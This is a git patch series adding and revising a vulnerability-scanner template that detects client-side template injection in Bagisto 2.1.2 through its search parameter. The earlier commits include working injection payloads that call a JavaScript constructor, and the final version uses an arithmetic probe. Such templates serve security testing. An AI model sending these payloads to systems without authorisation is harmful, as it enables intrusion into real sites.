From 96e47552d1caa4d21c578b4e0709232bea78a9d9 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 24 Jun 2024 16:51:36 +0300 Subject: [PATCH 1/3] add bagisto csti vuln --- http/vulnerabilities/other/bagisto-csti.yaml | 31 ++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/vulnerabilities/other/bagisto-csti.yaml diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml new file mode 100644 index 0000000000..1d8436c9d7 --- /dev/null +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -0,0 +1,31 @@ +id: bagisto-csti + +info: + name: Bagisto 2.1.2 Client-Side Template Injection + author: securityforeveryone + severity: medium + description: | + Bagisto is vulnerable to Client-Side Template Injection (CSTI), which allows an attacker to execute arbitrary code on the server. + reference: + - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html + - https://demo.bagisto.com/ + tags: packetstorm,bagisto,csti + +http: + - raw: + - | + GET /search?query={{_openBlock.constructor('alert(document.domain)')()}} HTTP/1.1 + Host: {{Hostname}} + + - raw: + - | + GET /search?query={{-function(){this.alert(document.domain)}()}} HTTP/1.1 + Host: {{Hostname}} + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'contains_all(body,"alert(document.domain)","Search results")' + - 'status_code==200' + condition: and \ No newline at end of file From a5405d91f4aabb5ac4613b36f49f1b1c10a86ca9 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 24 Jun 2024 16:53:00 +0300 Subject: [PATCH 2/3] fix --- http/vulnerabilities/other/bagisto-csti.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml index 1d8436c9d7..c4d4620ed2 100644 --- a/http/vulnerabilities/other/bagisto-csti.yaml +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -28,4 +28,4 @@ http: dsl: - 'contains_all(body,"alert(document.domain)","Search results")' - 'status_code==200' - condition: and \ No newline at end of file + condition: and From c7c7759329263ec28af14f88ea4d51ea757fe26b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 27 Jun 2024 16:02:22 +0530 Subject: [PATCH 3/3] minor update --- http/vulnerabilities/other/bagisto-csti.yaml | 33 +++++++++++--------- 1 file changed, 18 insertions(+), 15 deletions(-) diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml index c4d4620ed2..96ae031696 100644 --- a/http/vulnerabilities/other/bagisto-csti.yaml +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -9,23 +9,26 @@ info: reference: - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html - https://demo.bagisto.com/ - tags: packetstorm,bagisto,csti + metadata: + fofa-query: "Bagisto" + max-request: 1 + tags: bagisto,csti,packetstorm,ssti http: - - raw: - - | - GET /search?query={{_openBlock.constructor('alert(document.domain)')()}} HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/bagisto-common/search?query={{228*'98'}}" - - raw: - - | - GET /search?query={{-function(){this.alert(document.domain)}()}} HTTP/1.1 - Host: {{Hostname}} - - stop-at-first-match: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains_all(body,"alert(document.domain)","Search results")' - - 'status_code==200' + - type: word + part: body + words: + - "22344" + - "bagisto" condition: and + + - type: word + part: content_type + words: + - "text/html"